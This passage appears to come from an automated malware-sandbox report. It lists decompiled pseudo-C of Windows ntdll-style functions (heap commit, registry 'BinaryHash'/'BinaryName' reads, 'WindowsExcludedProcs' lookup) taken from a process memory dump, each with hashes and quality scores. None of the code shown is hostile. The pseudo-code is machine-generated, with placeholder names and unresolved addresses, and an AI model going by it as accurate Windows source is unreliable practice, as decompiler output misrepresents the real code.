                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				unsigned int _v32;
                                                                                      				signed int _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				char _v44;
                                                                                      				intOrPtr _v64;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				signed int _t58;
                                                                                      				unsigned int _t60;
                                                                                      				intOrPtr _t62;
                                                                                      				char* _t67;
                                                                                      				char* _t69;
                                                                                      				void* _t80;
                                                                                      				void* _t83;
                                                                                      				intOrPtr _t93;
                                                                                      				intOrPtr _t115;
                                                                                      				char _t117;
                                                                                      				void* _t120;
                                                                                      
                                                                                      				_t83 = __edx;
                                                                                      				_t117 = 0;
                                                                                      				_t120 = __ecx;
                                                                                      				_v44 = 0;
                                                                                      				if(E0187FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                      					L24:
                                                                                      					_t109 = _v44;
                                                                                      					if(_v44 != 0) {
                                                                                      						E01881074(_t83, _t120, _t109, _t117, _t117);
                                                                                      					}
                                                                                      					L26:
                                                                                      					return _t117;
                                                                                      				}
                                                                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                      				_t5 = _t83 + 1; // 0x1
                                                                                      				_v36 = _t5 << 0xc;
                                                                                      				_v40 = _t93;
                                                                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                      				asm("sbb ebx, ebx");
                                                                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                      				if(_t58 != 0) {
                                                                                      					_push(0);
                                                                                      					_push(0x14);
                                                                                      					_push( &_v24);
                                                                                      					_push(3);
                                                                                      					_push(_t93);
                                                                                      					_push(0xffffffff);
                                                                                      					_t80 = E017F9730();
                                                                                      					_t115 = _v64;
                                                                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                      						_push(_t93);
                                                                                      						E0187A80D(_t115, 1, _v20, _t117);
                                                                                      						_t83 = 4;
                                                                                      					}
                                                                                      				}
                                                                                      				if(E0187A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                      					goto L24;
                                                                                      				}
                                                                                      				_t60 = _v32;
                                                                                      				_t97 = (_t60 != 0x100000) + 1;
                                                                                      				_t83 = (_v44 -  *0x18a8b04 >> 0x14) + (_v44 -  *0x18a8b04 >> 0x14);
                                                                                      				_v28 = (_t60 != 0x100000) + 1;
                                                                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                      				_v40 = _t62;
                                                                                      				if(_t83 >= _t62) {
                                                                                      					L10:
                                                                                      					asm("lock xadd [eax], ecx");
                                                                                      					asm("lock xadd [eax], ecx");
                                                                                      					if(E017D7D50() == 0) {
                                                                                      						_t67 = 0x7ffe0380;
                                                                                      					} else {
                                                                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                      					}
                                                                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                      						E0187138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                      					}
                                                                                      					if(E017D7D50() == 0) {
                                                                                      						_t69 = 0x7ffe0388;
                                                                                      					} else {
                                                                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                      					}
                                                                                      					if( *_t69 != 0) {
                                                                                      						E0186FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                      					}
                                                                                      					if(( *0x18a8724 & 0x00000008) != 0) {
                                                                                      						E018752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                      					}
                                                                                      					_t117 = _v44;
                                                                                      					goto L26;
                                                                                      				}
                                                                                      				while(E018815B5(0x18a8ae4, _t83, _t97, _t97) >= 0) {
                                                                                      					_t97 = _v28;
                                                                                      					_t83 = _t83 + 2;
                                                                                      					if(_t83 < _v40) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				goto L24;
                                                                                      			}

























                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `
                                                                                      • API String ID: 0-2679148245
                                                                                      • Opcode ID: 71e61d3f773a2c431fcda4ce209e3a1a222ea7d064000430284080cdf3c771f4
                                                                                      • Instruction ID: a4207ef6d4ca2431f07848a641391afd23f1d5110b1d369d4c0b1b0ed0427c4c
                                                                                      • Opcode Fuzzy Hash: 71e61d3f773a2c431fcda4ce209e3a1a222ea7d064000430284080cdf3c771f4
                                                                                      • Instruction Fuzzy Hash: EC5181713043429FE325EF18D984B1BBBE5EBC4714F04492CF696D7291DA71EA0ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E017EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                      				intOrPtr _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				char* _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				char _v36;
                                                                                      				char _v44;
                                                                                      				char _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				char _v60;
                                                                                      				intOrPtr _v72;
                                                                                      				void* _t51;
                                                                                      				void* _t58;
                                                                                      				signed short _t82;
                                                                                      				short _t84;
                                                                                      				signed int _t91;
                                                                                      				signed int _t100;
                                                                                      				signed short* _t103;
                                                                                      				void* _t108;
                                                                                      				intOrPtr* _t109;
                                                                                      
                                                                                      				_t103 = __ecx;
                                                                                      				_t82 = __edx;
                                                                                      				_t51 = E017D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                      				if(_t51 >= 0) {
                                                                                      					_push(0x21);
                                                                                      					_push(3);
                                                                                      					_v56 =  *0x7ffe02dc;
                                                                                      					_v20 =  &_v52;
                                                                                      					_push( &_v44);
                                                                                      					_v28 = 0x18;
                                                                                      					_push( &_v28);
                                                                                      					_push(0x100020);
                                                                                      					_v24 = 0;
                                                                                      					_push( &_v60);
                                                                                      					_v16 = 0x40;
                                                                                      					_v12 = 0;
                                                                                      					_v8 = 0;
                                                                                      					_t58 = E017F9830();
                                                                                      					_t87 =  *[fs:0x30];
                                                                                      					_t108 = _t58;
                                                                                      					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                      					if(_t108 < 0) {
                                                                                      						L11:
                                                                                      						_t51 = _t108;
                                                                                      					} else {
                                                                                      						_push(4);
                                                                                      						_push(8);
                                                                                      						_push( &_v36);
                                                                                      						_push( &_v44);
                                                                                      						_push(_v60);
                                                                                      						_t108 = E017F9990();
                                                                                      						if(_t108 < 0) {
                                                                                      							L10:
                                                                                      							_push(_v60);
                                                                                      							E017F95D0();
                                                                                      							goto L11;
                                                                                      						} else {
                                                                                      							_t109 = L017D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                      							if(_t109 == 0) {
                                                                                      								_t108 = 0xc0000017;
                                                                                      								goto L10;
                                                                                      							} else {
                                                                                      								_t21 = _t109 + 0x18; // 0x18
                                                                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                      								 *_t109 = 1;
                                                                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                      								 *(_t109 + 0xe) = _t82;
                                                                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                      								E017FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                      								_t91 =  *_t103 & 0x0000ffff;
                                                                                      								_t100 = _t91 & 0xfffffffe;
                                                                                      								_t84 = 0x5c;
                                                                                      								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                      										_push(_v60);
                                                                                      										E017F95D0();
                                                                                      										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                      										_t51 = 0xc0000106;
                                                                                      									} else {
                                                                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                      										goto L5;
                                                                                      									}
                                                                                      								} else {
                                                                                      									L5:
                                                                                      									 *_a4 = _t109;
                                                                                      									_t51 = 0;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t51;
                                                                                      			}


























                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                      • Instruction ID: 259efc7b8808c29f8848937935dc412c404131f6ab1d7d5d92f70c6207e959c4
                                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                      • Instruction Fuzzy Hash: C7518972105715ABC321DF28C840A6BFBF8FF48710F00892EFA9687690E7B4E954CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E01833540(intOrPtr _a4) {
                                                                                      				signed int _v12;
                                                                                      				intOrPtr _v88;
                                                                                      				intOrPtr _v92;
                                                                                      				char _v96;
                                                                                      				char _v352;
                                                                                      				char _v1072;
                                                                                      				intOrPtr _v1140;
                                                                                      				intOrPtr _v1148;
                                                                                      				char _v1152;
                                                                                      				char _v1156;
                                                                                      				char _v1160;
                                                                                      				char _v1164;
                                                                                      				char _v1168;
                                                                                      				char* _v1172;
                                                                                      				short _v1174;
                                                                                      				char _v1176;
                                                                                      				char _v1180;
                                                                                      				char _v1192;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				short _t41;
                                                                                      				short _t42;
                                                                                      				intOrPtr _t80;
                                                                                      				intOrPtr _t81;
                                                                                      				signed int _t82;
                                                                                      				void* _t83;
                                                                                      
                                                                                      				_v12 =  *0x18ad360 ^ _t82;
                                                                                      				_t41 = 0x14;
                                                                                      				_v1176 = _t41;
                                                                                      				_t42 = 0x16;
                                                                                      				_v1174 = _t42;
                                                                                      				_v1164 = 0x100;
                                                                                      				_v1172 = L"BinaryHash";
                                                                                      				_t81 = E017F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                      				if(_t81 < 0) {
                                                                                      					L11:
                                                                                      					_t75 = _t81;
                                                                                      					E01833706(0, _t81, _t79, _t80);
                                                                                      					L12:
                                                                                      					if(_a4 != 0xc000047f) {
                                                                                      						E017FFA60( &_v1152, 0, 0x50);
                                                                                      						_v1152 = 0x60c201e;
                                                                                      						_v1148 = 1;
                                                                                      						_v1140 = E01833540;
                                                                                      						E017FFA60( &_v1072, 0, 0x2cc);
                                                                                      						_push( &_v1072);
                                                                                      						E0180DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                      						E01840C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                      						_push(_v1152);
                                                                                      						_push(0xffffffff);
                                                                                      						E017F97C0();
                                                                                      					}
                                                                                      					return E017FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                      				}
                                                                                      				_t79 =  &_v352;
                                                                                      				_t81 = E01833971(0, _a4,  &_v352,  &_v1156);
                                                                                      				if(_t81 < 0) {
                                                                                      					goto L11;
                                                                                      				}
                                                                                      				_t75 = _v1156;
                                                                                      				_t79 =  &_v1160;
                                                                                      				_t81 = E01833884(_v1156,  &_v1160,  &_v1168);
                                                                                      				if(_t81 >= 0) {
                                                                                      					_t80 = _v1160;
                                                                                      					E017FFA60( &_v96, 0, 0x50);
                                                                                      					_t83 = _t83 + 0xc;
                                                                                      					_push( &_v1180);
                                                                                      					_push(0x50);
                                                                                      					_push( &_v96);
                                                                                      					_push(2);
                                                                                      					_push( &_v1176);
                                                                                      					_push(_v1156);
                                                                                      					_t81 = E017F9650();
                                                                                      					if(_t81 >= 0) {
                                                                                      						if(_v92 != 3 || _v88 == 0) {
                                                                                      							_t81 = 0xc000090b;
                                                                                      						}
                                                                                      						if(_t81 >= 0) {
                                                                                      							_t75 = _a4;
                                                                                      							_t79 =  &_v352;
                                                                                      							E01833787(_a4,  &_v352, _t80);
                                                                                      						}
                                                                                      					}
                                                                                      					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                      				}
                                                                                      				_push(_v1156);
                                                                                      				E017F95D0();
                                                                                      				if(_t81 >= 0) {
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 0-2202222882
                                                                                      • Opcode ID: 30a942bda86116e7cd1323199f82de02a34c7d173b8e5696fbdd6037a443d1c3
                                                                                      • Instruction ID: 5ec2a63f66d67e5331d07cf89e93475d68cc797e8f97b1ee691e2cfea8893ca2
                                                                                      • Opcode Fuzzy Hash: 30a942bda86116e7cd1323199f82de02a34c7d173b8e5696fbdd6037a443d1c3
                                                                                      • Instruction Fuzzy Hash: C14133B290052D9FDB219A54CC84FDEB77CAB44714F0445A9EB09AB241EB309F889FD5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 71%
                                                                                      			E018805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				signed int _v28;
                                                                                      				char _v32;
                                                                                      				signed int _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				void* __ebx;
                                                                                      				void* _t35;
                                                                                      				signed int _t42;
                                                                                      				char* _t48;
                                                                                      				signed int _t59;
                                                                                      				signed char _t61;
                                                                                      				signed int* _t79;
                                                                                      				void* _t88;
                                                                                      
                                                                                      				_v28 = __edx;
                                                                                      				_t79 = __ecx;
                                                                                      				if(E018807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                      					L13:
                                                                                      					_t35 = 0;
                                                                                      					L14:
                                                                                      					return _t35;
                                                                                      				}
                                                                                      				_t61 = __ecx[1];
                                                                                      				_t59 = __ecx[0xf];
                                                                                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                      				_v36 = _a8 << 0xc;
                                                                                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                      				asm("sbb esi, esi");
                                                                                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                      				if(_t42 != 0) {
                                                                                      					_push(0);
                                                                                      					_push(0x14);
                                                                                      					_push( &_v24);
                                                                                      					_push(3);
                                                                                      					_push(_t59);
                                                                                      					_push(0xffffffff);
                                                                                      					if(E017F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                      						_push(_t61);
                                                                                      						E0187A80D(_t59, 1, _v20, 0);
                                                                                      						_t88 = 4;
                                                                                      					}
                                                                                      				}
                                                                                      				_t35 = E0187A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                      				if(_t35 < 0) {
                                                                                      					goto L14;
                                                                                      				}
                                                                                      				E01881293(_t79, _v40, E018807DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                      				if(E017D7D50() == 0) {
                                                                                      					_t48 = 0x7ffe0380;
                                                                                      				} else {
                                                                                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                      				}
                                                                                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                      					E0187138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                      				}
                                                                                      				goto L13;
                                                                                      			}

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `
                                                                                      • API String ID: 0-2679148245
                                                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                      • Instruction ID: 3d684b9b541d7b4e2817123ee51c938e6b992ab7678e35906fa963443cc90084
                                                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                      • Instruction Fuzzy Hash: D531E63260474A6BE720EE28CD85F9B7BD9EBC4758F184129FA54DB281D770EA08C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E01833884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                      				char _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				intOrPtr* _v16;
                                                                                      				char* _v20;
                                                                                      				short _v22;
                                                                                      				char _v24;
                                                                                      				intOrPtr _t38;
                                                                                      				short _t40;
                                                                                      				short _t41;
                                                                                      				void* _t44;
                                                                                      				intOrPtr _t47;
                                                                                      				void* _t48;
                                                                                      
                                                                                      				_v16 = __edx;
                                                                                      				_t40 = 0x14;
                                                                                      				_v24 = _t40;
                                                                                      				_t41 = 0x16;
                                                                                      				_v22 = _t41;
                                                                                      				_t38 = 0;
                                                                                      				_v12 = __ecx;
                                                                                      				_push( &_v8);
                                                                                      				_push(0);
                                                                                      				_push(0);
                                                                                      				_push(2);
                                                                                      				_t43 =  &_v24;
                                                                                      				_v20 = L"BinaryName";
                                                                                      				_push( &_v24);
                                                                                      				_push(__ecx);
                                                                                      				_t47 = 0;
                                                                                      				_t48 = E017F9650();
                                                                                      				if(_t48 >= 0) {
                                                                                      					_t48 = 0xc000090b;
                                                                                      				}
                                                                                      				if(_t48 != 0xc0000023) {
                                                                                      					_t44 = 0;
                                                                                      					L13:
                                                                                      					if(_t48 < 0) {
                                                                                      						L16:
                                                                                      						if(_t47 != 0) {
                                                                                      							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                      						}
                                                                                      						L18:
                                                                                      						return _t48;
                                                                                      					}
                                                                                      					 *_v16 = _t38;
                                                                                      					 *_a4 = _t47;
                                                                                      					goto L18;
                                                                                      				}
                                                                                      				_t47 = L017D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                      				if(_t47 != 0) {
                                                                                      					_push( &_v8);
                                                                                      					_push(_v8);
                                                                                      					_push(_t47);
                                                                                      					_push(2);
                                                                                      					_push( &_v24);
                                                                                      					_push(_v12);
                                                                                      					_t48 = E017F9650();
                                                                                      					if(_t48 < 0) {
                                                                                      						_t44 = 0;
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                      						_t48 = 0xc000090b;
                                                                                      					}
                                                                                      					_t44 = 0;
                                                                                      					if(_t48 < 0) {
                                                                                      						goto L16;
                                                                                      					} else {
                                                                                      						_t17 = _t47 + 0xc; // 0xc
                                                                                      						_t38 = _t17;
                                                                                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                      							_t48 = 0xc000090b;
                                                                                      						}
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				_t48 = _t48 + 0xfffffff4;
                                                                                      				goto L18;
                                                                                      			}


                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 0-215506332
                                                                                      • Opcode ID: f110b8d9cd3f75db6adaa2ec66dec53af0d7bc8fd22c521a091eb7beb1ccb9ff
                                                                                      • Instruction ID: 0e82446ff37d13042102b66fb3944a3ca8cfe77fa96295d8c0cdc72a8919cdfb
                                                                                      • Opcode Fuzzy Hash: f110b8d9cd3f75db6adaa2ec66dec53af0d7bc8fd22c521a091eb7beb1ccb9ff
                                                                                      • Instruction Fuzzy Hash: 1331D13290151AEFEB16DA58C945E6BFB74FB81B20F1A4169AE15EB251D6309F00CBE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 33%
                                                                                      			E017ED294(void* __ecx, char __edx, void* __eflags) {
                                                                                      				signed int _v8;
                                                                                      				char _v52;
                                                                                      				signed int _v56;
                                                                                      				signed int _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				char* _v68;
                                                                                      				intOrPtr _v72;
                                                                                      				char _v76;
                                                                                      				signed int _v84;
                                                                                      				intOrPtr _v88;
                                                                                      				char _v92;
                                                                                      				intOrPtr _v96;
                                                                                      				intOrPtr _v100;
                                                                                      				char _v104;
                                                                                      				char _v105;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t35;
                                                                                      				char _t38;
                                                                                      				signed int _t40;
                                                                                      				signed int _t44;
                                                                                      				signed int _t52;
                                                                                      				void* _t53;
                                                                                      				void* _t55;
                                                                                      				void* _t61;
                                                                                      				intOrPtr _t62;
                                                                                      				void* _t64;
                                                                                      				signed int _t65;
                                                                                      				signed int _t66;
                                                                                      
                                                                                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                      				_v8 =  *0x18ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                      				_v105 = __edx;
                                                                                      				_push( &_v92);
                                                                                      				_t52 = 0;
                                                                                      				_push(0);
                                                                                      				_push(0);
                                                                                      				_push( &_v104);
                                                                                      				_push(0);
                                                                                      				_t59 = __ecx;
                                                                                      				_t55 = 2;
                                                                                      				if(E017D4120(_t55, __ecx) < 0) {
                                                                                      					_t35 = 0;
                                                                                      					L8:
                                                                                      					_pop(_t61);
                                                                                      					_pop(_t64);
                                                                                      					_pop(_t53);
                                                                                      					return E017FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                      				}
                                                                                      				_v96 = _v100;
                                                                                      				_t38 = _v92;
                                                                                      				if(_t38 != 0) {
                                                                                      					_v104 = _t38;
                                                                                      					_v100 = _v88;
                                                                                      					_t40 = _v84;
                                                                                      				} else {
                                                                                      					_t40 = 0;
                                                                                      				}
                                                                                      				_v72 = _t40;
                                                                                      				_v68 =  &_v104;
                                                                                      				_push( &_v52);
                                                                                      				_v76 = 0x18;
                                                                                      				_push( &_v76);
                                                                                      				_v64 = 0x40;
                                                                                      				_v60 = _t52;
                                                                                      				_v56 = _t52;
                                                                                      				_t44 = E017F98D0();
                                                                                      				_t62 = _v88;
                                                                                      				_t65 = _t44;
                                                                                      				if(_t62 != 0) {
                                                                                      					asm("lock xadd [edi], eax");
                                                                                      					if((_t44 | 0xffffffff) != 0) {
                                                                                      						goto L4;
                                                                                      					}
                                                                                      					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                      					E017F95D0();
                                                                                      					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                      					goto L4;
                                                                                      				} else {
                                                                                      					L4:
                                                                                      					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                      					if(_t65 >= 0) {
                                                                                      						_t52 = 1;
                                                                                      					} else {
                                                                                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                      						}
                                                                                      					}
                                                                                      					_t35 = _t52;
                                                                                      					goto L8;
                                                                                      				}
                                                                                      			}


































                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 7ff380a216853809309539ac7d8a275d5c7fbb36f55e61e86fd886cbf1a93696
                                                                                      • Instruction ID: 6eb4e36aa71413f3b2890c51e3f2dea0b0a1feca5acc667fb80ee6265cd4585d
                                                                                      • Opcode Fuzzy Hash: 7ff380a216853809309539ac7d8a275d5c7fbb36f55e61e86fd886cbf1a93696
                                                                                      • Instruction Fuzzy Hash: 02319FB5508305DFD321DF68C988A6BFBE8EB99654F40092EF995C7250E634DD04CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E017C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                      				intOrPtr _v8;
                                                                                      				char _v16;
                                                                                      				intOrPtr* _t26;
                                                                                      				intOrPtr _t29;
                                                                                      				void* _t30;
                                                                                      				signed int _t31;
                                                                                      
                                                                                      				_t27 = __ecx;
                                                                                      				_t29 = __edx;
                                                                                      				_t31 = 0;
                                                                                      				_v8 = __edx;
                                                                                      				if(__edx == 0) {
                                                                                      					L18:
                                                                                      					_t30 = 0xc000000d;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					_t26 = _a4;
                                                                                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                      						goto L18;
                                                                                      					} else {
                                                                                      						E017FBB40(__ecx,  &_v16, __ecx);
                                                                                      						_push(_t26);
                                                                                      						_push(0);
                                                                                      						_push(0);
                                                                                      						_push(_t29);
                                                                                      						_push( &_v16);
                                                                                      						_t30 = E017FA9B0();
                                                                                      						if(_t30 >= 0) {
                                                                                      							_t19 =  *_t26;
                                                                                      							if( *_t26 != 0) {
                                                                                      								goto L7;
                                                                                      							} else {
                                                                                      								 *_a8 =  *_a8 & 0;
                                                                                      							}
                                                                                      						} else {
                                                                                      							if(_t30 != 0xc0000023) {
                                                                                      								L9:
                                                                                      								_push(_t26);
                                                                                      								_push( *_t26);
                                                                                      								_push(_t31);
                                                                                      								_push(_v8);
                                                                                      								_push( &_v16);
                                                                                      								_t30 = E017FA9B0();
                                                                                      								if(_t30 < 0) {
                                                                                      									L12:
                                                                                      									if(_t31 != 0) {
                                                                                      										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                      									}
                                                                                      								} else {
                                                                                      									 *_a8 = _t31;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t19 =  *_t26;
                                                                                      								if( *_t26 == 0) {
                                                                                      									_t31 = 0;
                                                                                      								} else {
                                                                                      									L7:
                                                                                      									_t31 = L017D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                      								}
                                                                                      								if(_t31 == 0) {
                                                                                      									_t30 = 0xc0000017;
                                                                                      								} else {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t30;
                                                                                      			}










                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: WindowsExcludedProcs
                                                                                      • API String ID: 0-3583428290
                                                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                      • Instruction ID: 504255c9d31a172762b4ecac8bfc47535654b1d0b11d2429c74a149350a5b26b
                                                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                      • Instruction Fuzzy Hash: AA21C57B601229EBDB32DA59C844F9BFBADAF41B50F45447DFA04DB205D630DE0197A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E017DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				intOrPtr _t13;
                                                                                      				intOrPtr _t14;
                                                                                      				signed int _t16;
                                                                                      				signed char _t17;
                                                                                      				intOrPtr _t19;
                                                                                      				intOrPtr _t21;
                                                                                      				intOrPtr _t23;
                                                                                      				intOrPtr* _t25;
                                                                                      
                                                                                      				_t25 = _a8;
